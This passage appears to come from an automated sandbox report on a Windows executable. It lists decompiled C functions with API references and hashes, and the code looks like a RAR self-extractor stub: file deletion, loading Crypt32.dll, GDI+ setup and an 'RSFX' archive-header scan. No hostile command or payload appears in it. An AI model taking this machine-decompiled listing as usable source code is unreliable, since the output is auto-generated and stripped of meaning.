    • DeleteFileW.KERNELBASE(?,?,?,008396E0,?,?,0083953B), ref: 00839ECD
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,008396E0,?,?,0083953B), ref: 00839EFB
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DeleteFile
    • String ID:
    • API String ID: 4033686569-0
    • Opcode ID: eed2ac1233121d35fbaa4563e7bb25fdd63e57273b53443de482a8ad6619c76b
    • Instruction ID: 9d94c18f4ef8ea772f0e74477bb8e234a2a04d0d9a6c12cdbe6b7752e91acf95
    • Opcode Fuzzy Hash: eed2ac1233121d35fbaa4563e7bb25fdd63e57273b53443de482a8ad6619c76b
    • Instruction Fuzzy Hash: 75E022306412096BDB01AF64DC01FE9779CFF083C1F4801A2F888C2150DFA18C94EAE1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00839F23(WCHAR* _a4) {
    				short _v4100;
    				long _t6;
    				long _t11;
    				long _t13;
    
    				E0084D9C0();
    				_t6 = GetFileAttributesW(_a4); // executed
    				_t13 = _t6;
    				if(_t13 == 0xffffffff && E0083B3C9(_a4,  &_v4100, 0x800) != 0) {
    					_t11 = GetFileAttributesW( &_v4100); // executed
    					_t13 = _t11;
    				}
    				return _t13;
    			}







    0x00839f2b
    0x00839f34
    0x00839f3a
    0x00839f3f
    0x00839f60
    0x00839f66
    0x00839f66
    0x00839f6e

    APIs
    • GetFileAttributesW.KERNELBASE(?,?,?,00839F18,?,008375EA,?,?,?,?), ref: 00839F34
    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00839F18,?,008375EA,?,?,?,?), ref: 00839F60
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 9396b4e33ccf611e0592b34ad08beca909a646d89b20e8db9dba1cb5637d50d5
    • Instruction ID: 0d99ed99a1f6b63eb8d3c627891cd5952f25ce561b8ce861c8bc05e7f6eb3e98
    • Opcode Fuzzy Hash: 9396b4e33ccf611e0592b34ad08beca909a646d89b20e8db9dba1cb5637d50d5
    • Instruction Fuzzy Hash: 4DE09B3150022857CB11AB6CDC04BD5BB9CFB083E1F0142A1FD84E32D0DBB05D45C6D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0083FD16(intOrPtr _a4) {
    				short _v4100;
    				struct HINSTANCE__* _t7;
    
    				E0084D9C0();
    				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
    				if(_t7 != 0) {
    					E0083B6C2( &_v4100, _a4,  &_v4100, 0x800);
    					_t7 = LoadLibraryW( &_v4100); // executed
    				}
    				return _t7;
    			}





    0x0083fd1e
    0x0083fd31
    0x0083fd39
    0x0083fd47
    0x0083fd53
    0x0083fd53
    0x0083fd5d

    APIs
    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DirectoryLibraryLoadSystem
    • String ID:
    • API String ID: 1175261203-0
    • Opcode ID: 8d173187ac228c5e5a6a6053b22ff6764c023e3623d0ec26362b8e30ab37a0e1
    • Instruction ID: 72c2b2292ce66767077be245813c648025f380196c79bb8b27c02bb38fe6eea3
    • Opcode Fuzzy Hash: 8d173187ac228c5e5a6a6053b22ff6764c023e3623d0ec26362b8e30ab37a0e1
    • Instruction Fuzzy Hash: 40E0127690111C6ADB119AA49C09FDA77ACFF08381F4400E5BA49D2015DAB49940CBE1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00849401(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				signed int* _t10;
    				signed int _t15;
    
    				_push(__ecx);
    				_t15 = __ecx;
    				_t10 =  &_v8;
    				_v8 = __ecx;
    				_v8 = _v8 & 0x00000000;
    				_push(_t10);
    				_push(_a4);
    				 *__ecx = 0x863398;
    				if(_a8 == 0) {
    					L0084D862(); // executed
    				} else {
    					L0084D868();
    				}
    				 *((intOrPtr*)(_t15 + 8)) = _t10;
    				 *(_t15 + 4) = _v8;
    				return _t15;
    			}






    0x00849404
    0x00849406
    0x00849408
    0x0084940b
    0x0084940e
    0x00849416
    0x00849417
    0x0084941a
    0x00849420
    0x00849429
    0x00849422
    0x00849422
    0x00849422
    0x0084942e
    0x00849434
    0x0084943d

    APIs
    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00849422
    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00849429
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: BitmapCreateFromGdipStream
    • String ID:
    • API String ID: 1918208029-0
    • Opcode ID: 90c95f9765bb619376b9f4ce4806c445b398768ee03598fdba824c55deae279d
    • Instruction ID: be3ebc4915ec6c11429f42222a8ea4bedb7c0e6ca4bdf38f6fcb9f7ece550cc5
    • Opcode Fuzzy Hash: 90c95f9765bb619376b9f4ce4806c445b398768ee03598fdba824c55deae279d
    • Instruction Fuzzy Hash: B9E06D7180030CEBCB20DF99C5047AAB7F8FB04360F10846AE898D3700E6706E049B92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00849B7B(void* __ecx) {
    				intOrPtr _v16;
    				intOrPtr* _t5;
    				void* _t7;
    				void* _t11;
    				intOrPtr _t14;
    
    				 *[fs:0x0] = _t14;
    				_t5 =  *0x8775c0; // 0x74f5c100
    				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E0086146D, 0xffffffff);
    				L0084D87A(); // executed
    				_t7 =  *0x86dff0( *((intOrPtr*)(__ecx + 4))); // executed
    				 *[fs:0x0] = _v16;
    				return _t7;
    			}








    0x00849b8c
    0x00849b93
    0x00849b9e
    0x00849ba4
    0x00849ba9
    0x00849bb2
    0x00849bbd

    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,0086146D,000000FF), ref: 00849BA4
    • OleUninitialize.OLE32(?,?,?,0086146D,000000FF), ref: 00849BA9
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: 90d34218e2d6b32b634702e74abeb6d5ad478caef002bb4462eb93c6b0b747a1
    • Instruction ID: 34439bdea5e2c6aadffab3f8a1405332b744d1a6bfb830bb78b5100ac772dbcb
    • Opcode Fuzzy Hash: 90d34218e2d6b32b634702e74abeb6d5ad478caef002bb4462eb93c6b0b747a1
    • Instruction Fuzzy Hash: DBE01A766486449FC710DB48DC05F55B7A8FB08B20F044769F81AC3B54CB74A800CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00851726(void* __ecx, void* __eflags) {
    				intOrPtr _t1;
    				void* _t2;
    				void* _t9;
    
    				_t1 = E00852877(__eflags, E0085166A); // executed
    				 *0x86d680 = _t1;
    				if(_t1 != 0xffffffff) {
    					_t2 = E00852925(__eflags, _t1, 0x8901dc);
    					_pop(_t9);
    					__eflags = _t2;
    					if(_t2 != 0) {
    						return 1;
    					} else {
    						E00851759(_t9);
    						goto L1;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}






    0x0085172b
    0x00851730
    0x00851739
    0x00851744
    0x0085174a
    0x0085174b
    0x0085174d
    0x00851758
    0x0085174f
    0x0085174f
    0x00000000
    0x0085174f
    0x0085173b
    0x0085173b
    0x0085173d
    0x0085173d

    APIs
      • Part of subcall function 00852877: try_get_function.LIBVCRUNTIME ref: 0085288C
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00851744
    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0085174F
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
    • String ID:
    • API String ID: 806969131-0
    • Opcode ID: 82cdaef1635c4c7aaace799d8583b2df87e9b1a846daa300b9b709b314ec578d
    • Instruction ID: 4d1e5da7088bb834ec83a99ed204c880b0b08cb475c057cd6735676197283bd2
    • Opcode Fuzzy Hash: 82cdaef1635c4c7aaace799d8583b2df87e9b1a846daa300b9b709b314ec578d
    • Instruction Fuzzy Hash: 20D02324A04701080E04377C680AF552754F527777BF15745FC30C95C5FE24800DB417
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E008312B2(struct HWND__* _a4, int _a8, signed char _a12) {
    				int _t8;
    
    				asm("sbb eax, eax");
    				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
    				return _t8;
    			}




    0x008312b9
    0x008312ce
    0x008312d4

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemShowWindow
    • String ID:
    • API String ID: 3351165006-0
    • Opcode ID: dbaf1cd073b0689f72e2a4454db75c2702e484f80ceff640a807be80e4d3c8ad
    • Instruction ID: 2a18b8faad2c2eb9840b01711487770b6962020fa40cb14d84c29863bd1fe935
    • Opcode Fuzzy Hash: dbaf1cd073b0689f72e2a4454db75c2702e484f80ceff640a807be80e4d3c8ad
    • Instruction Fuzzy Hash: 1BC01272A58200BECB011BB0EC09D2EBBA8BBA4212F06C908F0A6C20A0CA78C010DB11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E008319C1(intOrPtr* __ecx, intOrPtr __edx) {
    				signed int _t106;
    				intOrPtr _t109;
    				signed int _t110;
    				signed int _t112;
    				signed int _t113;
    				signed int _t114;
    				signed int _t115;
    				signed int _t116;
    				signed int _t125;
    				intOrPtr _t126;
    				char _t133;
    				intOrPtr _t138;
    				signed int _t139;
    				signed int _t140;
    				void* _t142;
    				signed int _t147;
    				intOrPtr _t148;
    				signed int _t150;
    				void* _t154;
    				void* _t155;
    				char _t159;
    				signed int _t168;
    				void* _t169;
    				signed int _t171;
    				char* _t183;
    				intOrPtr _t184;
    				intOrPtr _t190;
    				intOrPtr* _t192;
    				signed int _t196;
    				intOrPtr _t198;
    				char* _t199;
    				intOrPtr _t200;
    				void* _t201;
    
    				_t190 = __edx;
    				E0084D8C4(E008611DD, __ecx);
    				_t192 = __ecx;
    				_t159 = 0;
    				_push(7);
    				_t195 = __ecx + 0x21f8;
    				_push(__ecx + 0x21f8);
    				 *((char*)(__ecx + 0x6cbc)) = 0;
    				 *((char*)(__ecx + 0x6cc4)) = 0;
    				if( *((intOrPtr*)( *__ecx + 0xc))() == 7) {
    					 *((intOrPtr*)(__ecx + 0x6cc0)) = 0;
    					_t106 = E00831D59(_t195, 7);
    					__eflags = _t106;
    					if(_t106 == 0) {
    						E0083134C(_t201 - 0x30, 0x200000);
    						 *(_t201 - 4) = 0;
    						_t109 =  *((intOrPtr*)( *_t192 + 0x14))();
    						_t190 =  *_t192;
    						 *((intOrPtr*)(_t201 - 0x18)) = _t109;
    						_t110 =  *((intOrPtr*)(_t190 + 0xc))( *((intOrPtr*)(_t201 - 0x30)),  *((intOrPtr*)(_t201 - 0x2c)) + 0xfffffff0);
    						_t168 = _t110;
    						_t196 = 0;
    						 *(_t201 - 0x14) = _t168;
    						__eflags = _t168;
    						if(_t168 <= 0) {
    							L22:
    							_t169 = _t201 - 0x30;
    							__eflags =  *((intOrPtr*)(_t192 + 0x6cc0)) - _t159;
    							if( *((intOrPtr*)(_t192 + 0x6cc0)) != _t159) {
    								_t35 = _t201 - 4; // executed
    								 *_t35 =  *(_t201 - 4) | 0xffffffff;
    								__eflags =  *_t35;
    								E0083158D(_t169); // executed
    								goto L25;
    							}
    							E0083158D(_t169);
    							goto L1;
    						} else {
    							goto L6;
    						}
    						do {
    							L6:
    							_t183 =  *((intOrPtr*)(_t201 - 0x30)) + _t196;
    							__eflags =  *_t183 - 0x52;
    							if( *_t183 != 0x52) {
    								goto L17;
    							}
    							_t147 = E00831D59(_t183, _t110 - _t196);
    							__eflags = _t147;
    							if(_t147 == 0) {
    								L16:
    								_t110 =  *(_t201 - 0x14);
    								goto L17;
    							}
    							_t184 =  *((intOrPtr*)(_t201 - 0x18));
    							 *(_t192 + 0x6cb0) = _t147;
    							__eflags = _t147 - 1;
    							if(_t147 != 1) {
    								L19:
    								_t190 =  *_t192;
    								_t148 = _t196 + _t184;
    								 *((intOrPtr*)(_t192 + 0x6cc0)) = _t148;
    								 *((intOrPtr*)(_t190 + 0x10))(_t148, _t159, _t159);
    								_t150 =  *(_t192 + 0x6cb0);
    								__eflags = _t150 - 2;
    								if(_t150 == 2) {
    									L21:
    									 *((intOrPtr*)( *_t192 + 0xc))(_t192 + 0x21f8, 7);
    									goto L22;
    								}
    								__eflags = _t150 - 3;
    								if(_t150 != 3) {
    									goto L22;
    								}
    								goto L21;
    							}
    							__eflags = _t196;
    							if(_t196 <= 0) {
    								goto L19;
    							}
    							__eflags = _t184 - 0x1c;
    							if(_t184 >= 0x1c) {
    								goto L19;
    							}
    							__eflags =  *(_t201 - 0x14) - 0x1f;
    							if( *(_t201 - 0x14) <= 0x1f) {
    								goto L19;
    							}
    							_t154 =  *((intOrPtr*)(_t201 - 0x30)) - _t184;
    							__eflags =  *((char*)(_t154 + 0x1c)) - 0x52;
    							if( *((char*)(_t154 + 0x1c)) != 0x52) {
    								goto L16;
    							}
    							__eflags =  *((char*)(_t154 + 0x1d)) - 0x53;
    							if( *((char*)(_t154 + 0x1d)) != 0x53) {
    								goto L16;
    							}
    							__eflags =  *((char*)(_t154 + 0x1e)) - 0x46;
    							if( *((char*)(_t154 + 0x1e)) != 0x46) {
    								goto L16;
    							}
    							__eflags =  *((char*)(_t154 + 0x1f)) - 0x58;
    							if( *((char*)(_t154 + 0x1f)) == 0x58) {
    								goto L19;
    							}
    							goto L16;
    							L17:
    							_t196 = _t196 + 1;
    							__eflags = _t196 - _t110;
    						} while (_t196 < _t110);
    						goto L22;
    					} else {
    						 *(_t192 + 0x6cb0) = _t106;
    						__eflags = _t106 - 1;
    						if(_t106 == 1) {
    							_t200 =  *_t192;
    							_t155 =  *((intOrPtr*)(_t200 + 0x14))(0);
    							asm("sbb edx, ebx");
    							 *((intOrPtr*)(_t200 + 0x10))(_t155 - 7, __edx);
    						}
    						L25:
    						_t112 =  *(_t192 + 0x6cb0);
    						__eflags = _t112 - 4;
    						if(__eflags != 0) {
    							__eflags = _t112 - 3;
    							if(_t112 != 3) {
    								 *((intOrPtr*)(_t192 + 0x2200)) = 7;
    								L32:
    								 *((char*)(_t201 - 0xd)) = _t159;
    								_t113 = E00833A2C(_t192, _t190);
    								__eflags = _t113;
    								_t114 = _t113 & 0xffffff00 | _t113 != 0x00000000;
    								 *(_t201 - 0xe) = _t114;
    								__eflags = _t114 - 1;
    								if(_t114 != 1) {
    									L38:
    									_t115 =  *((intOrPtr*)(_t201 - 0xd));
    									L39:
    									_t171 =  *((intOrPtr*)(_t192 + 0x6cc5));
    									__eflags = _t171;
    									if(_t171 == 0) {
    										L41:
    										__eflags =  *((char*)(_t192 + 0x6cc4));
    										if( *((char*)(_t192 + 0x6cc4)) != 0) {
    											L43:
    											__eflags = _t171;
    											if(__eflags == 0) {
    												E00836D22(__eflags, 0x1b, _t192 + 0x1e);
    											}
    											__eflags =  *((char*)(_t201 + 8));
    											if( *((char*)(_t201 + 8)) == 0) {
    												goto L1;
    											} else {
    												L46:
    												__eflags =  *(_t201 - 0xe);
    												 *((char*)(_t192 + 0x6cb6)) =  *((intOrPtr*)(_t192 + 0x2224));
    												if( *(_t201 - 0xe) == 0) {
    													L67:
    													__eflags =  *((char*)(_t192 + 0x6cb5));
    													if( *((char*)(_t192 + 0x6cb5)) == 0) {
    														L69:
    														E0083FAE7(_t192 + 0x6cfa, _t192 + 0x1e, 0x800);
    														L70:
    														_t116 = 1;
    														L71:
    														 *[fs:0x0] =  *((intOrPtr*)(_t201 - 0xc));
    														return _t116;
    													}
    													__eflags =  *((char*)(_t192 + 0x6cb9));
    													if( *((char*)(_t192 + 0x6cb9)) == 0) {
    														goto L70;
    													}
    													goto L69;
    												}
    												__eflags =  *((char*)(_t192 + 0x21e0));
    												if( *((char*)(_t192 + 0x21e0)) == 0) {
    													L49:
    													 *((intOrPtr*)(_t201 - 0x2c)) = _t192;
    													 *((intOrPtr*)(_t201 - 0x24)) =  *((intOrPtr*)( *_t192 + 0x14))();
    													 *((intOrPtr*)(_t201 - 0x20)) = _t190;
    													_t198 =  *((intOrPtr*)(_t192 + 0x6ca0));
    													 *((intOrPtr*)(_t201 + 8)) =  *((intOrPtr*)(_t192 + 0x6ca4));
    													 *((intOrPtr*)(_t201 - 0x18)) =  *((intOrPtr*)(_t192 + 0x6ca8));
    													 *(_t201 - 0x14) =  *(_t192 + 0x6cac);
    													 *(_t201 - 4) = 1;
    													 *((intOrPtr*)(_t201 - 0x1c)) =  *((intOrPtr*)(_t192 + 0x21dc));
    													while(1) {
    														_t125 = E00833A2C(_t192, _t190);
    														__eflags = _t125;
    														if(_t125 == 0) {
    															break;
    														}
    														_t126 =  *((intOrPtr*)(_t192 + 0x21dc));
    														__eflags = _t126 - 3;
    														if(_t126 != 3) {
    															__eflags = _t126 - 2;
    															if(_t126 == 2) {
    																__eflags =  *((char*)(_t192 + 0x6cb5));
    																if( *((char*)(_t192 + 0x6cb5)) != 0) {
    																	__eflags =  *((char*)(_t192 + 0x3318));
    																	if( *((char*)(_t192 + 0x3318)) == 0) {
    																		_t159 = 1;
    																		__eflags = 1;
    																	}
    																}
    																 *((char*)(_t192 + 0x6cb9)) = _t159;
    																L66:
    																_t87 = _t201 - 4;
    																 *_t87 =  *(_t201 - 4) | 0xffffffff;
    																__eflags =  *_t87;
    																 *((intOrPtr*)(_t192 + 0x6ca4)) =  *((intOrPtr*)(_t201 + 8));
    																 *((intOrPtr*)(_t192 + 0x6ca8)) =  *((intOrPtr*)(_t201 - 0x18));
    																 *(_t192 + 0x6cac) =  *(_t201 - 0x14);
    																 *((intOrPtr*)(_t192 + 0x6ca0)) = _t198;
    																 *((intOrPtr*)(_t192 + 0x21dc)) =  *((intOrPtr*)(_t201 - 0x1c));
    																E0083168F(_t201 - 0x2c); // executed
    																goto L67;
    															}
    															__eflags = _t126 - 5;
    															if(_t126 == 5) {
    																goto L66;
    															}
    															L59:
    															E00831E8B(_t192);
    															continue;
    														}
    														__eflags =  *((char*)(_t192 + 0x6cb5));
    														if( *((char*)(_t192 + 0x6cb5)) == 0) {
    															L55:
    															_t133 = _t159;
    															L56:
    															 *((char*)(_t192 + 0x6cb9)) = _t133;
    															goto L59;
    														}
    														__eflags =  *((char*)(_t192 + 0x5668));
    														if( *((char*)(_t192 + 0x5668)) != 0) {
    															goto L55;
    														}
    														_t133 = 1;
    														goto L56;
    													}
    													goto L66;
    												}
    												__eflags =  *((char*)(_t192 + 0x6cbc));
    												if( *((char*)(_t192 + 0x6cbc)) != 0) {
    													goto L67;
    												}
    												goto L49;
    											}
    										}
    										__eflags = _t115;
    										if(_t115 != 0) {
    											goto L46;
    										}
    										goto L43;
    									}
    									__eflags =  *((char*)(_t201 + 8));
    									if( *((char*)(_t201 + 8)) == 0) {
    										goto L1;
    									}
    									goto L41;
    								}
    								 *((char*)(_t201 - 0xd)) = _t159;
    								while(1) {
    									E00831E8B(_t192);
    									_t138 =  *((intOrPtr*)(_t192 + 0x21dc));
    									__eflags = _t138 - 1;
    									if(_t138 == 1) {
    										break;
    									}
    									__eflags =  *((char*)(_t192 + 0x21e0));
    									if( *((char*)(_t192 + 0x21e0)) == 0) {
    										L37:
    										_t139 = E00833A2C(_t192, _t190);
    										__eflags = _t139;
    										_t140 = _t139 & 0xffffff00 | _t139 != 0x00000000;
    										 *(_t201 - 0xe) = _t140;
    										__eflags = _t140 - 1;
    										if(_t140 == 1) {
    											continue;
    										}
    										goto L38;
    									}
    									__eflags = _t138 - 4;
    									if(_t138 == 4) {
    										break;
    									}
    									goto L37;
    								}
    								_t115 = 1;
    								goto L39;
    							}
    							_t199 = _t192 + 0x21ff;
    							_t142 =  *((intOrPtr*)( *_t192 + 0xc))(_t199, 1);
    							__eflags = _t142 - 1;
    							if(_t142 != 1) {
    								goto L1;
    							}
    							__eflags =  *_t199;
    							if( *_t199 != 0) {
    								goto L1;
    							}
    							 *((intOrPtr*)(_t192 + 0x2200)) = 8;
    							goto L32;
    						}
    						E00836D22(__eflags, 0x3c, _t192 + 0x1e);
    						goto L1;
    					}
    				}
    				L1:
    				_t116 = 0;
    				goto L71;
    			}




































    0x008319c1
    0x008319c6
    0x008319d1
    0x008319d3
    0x008319d5
    0x008319d9
    0x008319df
    0x008319e0
    0x008319e6
    0x008319f2
    0x008319fe
    0x00831a04
    0x00831a09
    0x00831a0b
    0x00831a3d
    0x00831a46
    0x00831a49
    0x00831a4f
    0x00831a5a
    0x00831a5d
    0x00831a60
    0x00831a62
    0x00831a64
    0x00831a67
    0x00831a69
    0x00831afd
    0x00831afd
    0x00831b00
    0x00831b06
    0x00831b12
    0x00831b12
    0x00831b12
    0x00831b16
    0x00000000
    0x00831b16
    0x00831b08
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00831a6f
    0x00831a6f
    0x00831a72
    0x00831a74
    0x00831a77
    0x00000000
    0x00000000
    0x00831a7d
    0x00831a82
    0x00831a84
    0x00831ac0
    0x00831ac0
    0x00000000
    0x00831ac0
    0x00831a86
    0x00831a89
    0x00831a8f
    0x00831a92
    0x00831aca
    0x00831aca
    0x00831acc
    0x00831ad4
    0x00831ada
    0x00831add
    0x00831ae3
    0x00831ae6
    0x00831aed
    0x00831afa
    0x00000000
    0x00831afa
    0x00831ae8
    0x00831aeb
    0x00000000
    0x00000000
    0x00000000
    0x00831aeb
    0x00831a94
    0x00831a96
    0x00000000
    0x00000000
    0x00831a98
    0x00831a9b
    0x00000000
    0x00000000
    0x00831a9d
    0x00831aa1
    0x00000000
    0x00000000
    0x00831aa6
    0x00831aa8
    0x00831aac
    0x00000000
    0x00000000
    0x00831aae
    0x00831ab2
    0x00000000
    0x00000000
    0x00831ab4
    0x00831ab8
    0x00000000
    0x00000000
    0x00831aba
    0x00831abe
    0x00000000
    0x00000000
    0x00000000
    0x00831ac3
    0x00831ac3
    0x00831ac4
    0x00831ac4
    0x00000000
    0x00831a0d
    0x00831a0d
    0x00831a13
    0x00831a16
    0x00831a1c
    0x00831a21
    0x00831a29
    0x00831a2d
    0x00831a2d
    0x00831b1b
    0x00831b1b
    0x00831b21
    0x00831b24
    0x00831b36
    0x00831b39
    0x00831b69
    0x00831b73
    0x00831b75
    0x00831b78
    0x00831b7d
    0x00831b7f
    0x00831b82
    0x00831b85
    0x00831b87
    0x00831bc7
    0x00831bc7
    0x00831bca
    0x00831bca
    0x00831bd0
    0x00831bd2
    0x00831bde
    0x00831bde
    0x00831be5
    0x00831beb
    0x00831beb
    0x00831bed
    0x00831bf5
    0x00831bf5
    0x00831bfa
    0x00831bfe
    0x00000000
    0x00831c04
    0x00831c04
    0x00831c04
    0x00831c0e
    0x00831c14
    0x00831d15
    0x00831d15
    0x00831d1c
    0x00831d27
    0x00831d37
    0x00831d3c
    0x00831d3c
    0x00831d3e
    0x00831d44
    0x00831d4e
    0x00831d4e
    0x00831d1e
    0x00831d25
    0x00000000
    0x00000000
    0x00000000
    0x00831d25
    0x00831c1a
    0x00831c21
    0x00831c30
    0x00831c34
    0x00831c3a
    0x00831c3d
    0x00831c46
    0x00831c4c
    0x00831c55
    0x00831c5e
    0x00831c67
    0x00831c6e
    0x00831cb7
    0x00831cb9
    0x00831cbe
    0x00831cc0
    0x00000000
    0x00000000
    0x00831c7a
    0x00831c80
    0x00831c83
    0x00831ca6
    0x00831ca9
    0x00831cc4
    0x00831ccb
    0x00831ccd
    0x00831cd4
    0x00831cd8
    0x00831cd8
    0x00831cd8
    0x00831cd4
    0x00831cd9
    0x00831cdf
    0x00831ce5
    0x00831ce5
    0x00831ce5
    0x00831ce9
    0x00831cf2
    0x00831cfb
    0x00831d04
    0x00831d0a
    0x00831d10
    0x00000000
    0x00831d10
    0x00831cab
    0x00831cae
    0x00000000
    0x00000000
    0x00831cb0
    0x00831cb2
    0x00000000
    0x00831cb2
    0x00831c85
    0x00831c8c
    0x00831c9c
    0x00831c9c
    0x00831c9e
    0x00831c9e
    0x00000000
    0x00831c9e
    0x00831c8e
    0x00831c95
    0x00000000
    0x00000000
    0x00831c99
    0x00000000
    0x00831c99
    0x00000000
    0x00831cc2
    0x00831c23
    0x00831c2a
    0x00000000
    0x00000000
    0x00000000
    0x00831c2a
    0x00831bfe
    0x00831be7
    0x00831be9
    0x00000000
    0x00000000
    0x00000000
    0x00831be9
    0x00831bd4
    0x00831bd8
    0x00000000
    0x00000000
    0x00000000
    0x00831bd8
    0x00831b89
    0x00831b8c
    0x00831b8e
    0x00831b93
    0x00831b99
    0x00831b9c
    0x00000000
    0x00000000
    0x00831ba2
    0x00831ba9
    0x00831bb4
    0x00831bb6
    0x00831bbb
    0x00831bbd
    0x00831bc0
    0x00831bc3
    0x00831bc5
    0x00000000
    0x00000000
    0x00000000
    0x00831bc5
    0x00831bab
    0x00831bae
    0x00000000
    0x00000000
    0x00000000
    0x00831bae
    0x00831c73
    0x00000000
    0x00831c73
    0x00831b3d
    0x00831b48
    0x00831b4b
    0x00831b4e
    0x00000000
    0x00000000
    0x00831b54
    0x00831b57
    0x00000000
    0x00000000
    0x00831b5d
    0x00000000
    0x00831b5d
    0x00831b2c
    0x00000000
    0x00831b2c
    0x00831a0b
    0x008319f4
    0x008319f4
    0x00000000

    APIs
